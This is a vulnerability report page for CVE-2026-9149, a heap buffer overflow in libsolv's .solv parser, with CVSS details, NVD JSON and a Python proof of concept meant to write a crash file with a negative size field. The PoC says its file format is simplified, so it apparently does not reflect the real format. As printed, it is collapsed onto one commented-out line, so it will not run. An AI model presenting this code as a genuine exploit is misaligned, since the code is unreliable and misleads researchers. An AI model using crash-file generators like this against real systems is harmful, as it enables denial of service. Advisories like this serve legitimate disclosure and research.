Security Vulnerability Report
中文
CVE-2026-9149 CVSS 6.5 MEDIUM

CVE-2026-9149

Published: 2026-05-21 00:16:36
Last Modified: 2026-05-21 00:16:36
Source: [email protected]

Description

A flaw was found in libsolv. This heap buffer overflow vulnerability occurs when a victim processes a specially crafted `.solv` file containing negative size values in the `repo_add_solv` function. This leads to an undersized memory allocation and a subsequent out-of-bounds write. An attacker could exploit this to cause a denial of service (DoS).

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

libsolv (修复前版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct # Proof of Concept for CVE-2026-9149 # This script generates a malformed .solv file with a negative size value. # Note: The actual .solv file format structure is simplified here for demonstration. def create_malformed_solv(filename): with open(filename, 'wb') as f: # .solv file header usually starts with magic bytes and specific format info # We simulate a header where a size field is set to a negative value # If the code reads this as a signed int and uses it for malloc, it causes issues. # Example Header Structure (Simplified) f.write(b'SOLV') # Magic bytes f.write(struct.pack('<I', 1)) # Format version # Simulate a repository entry with negative size # Normally this would be a positive integer representing payload size negative_size = -1 # 0xFFFFFFFF in 32-bit two's complement if interpreted as unsigned # Writing the negative size as if it were a valid length field # Depending on parsing logic (signed vs unsigned), this triggers the bug f.write(struct.pack('<i', negative_size)) # Write dummy padding to simulate file content f.write(b'A' * 100) if __name__ == "__main__": print("Generating malformed .solv file...") create_malformed_solv("crash.solv") print("File created: crash.solv") # Usage: Load this file with a vulnerable version of libsolv.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-9149", "sourceIdentifier": "[email protected]", "published": "2026-05-21T00:16:35.630", "lastModified": "2026-05-21T00:16:35.630", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in libsolv. This heap buffer overflow vulnerability occurs when a victim processes a specially crafted `.solv` file containing negative size values in the `repo_add_solv` function. This leads to an undersized memory allocation and a subsequent out-of-bounds write. An attacker could exploit this to cause a denial of service (DoS)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-9149", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460380", "source": "[email protected]"}, {"url": "https://github.com/openSUSE/libsolv/pull/617", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.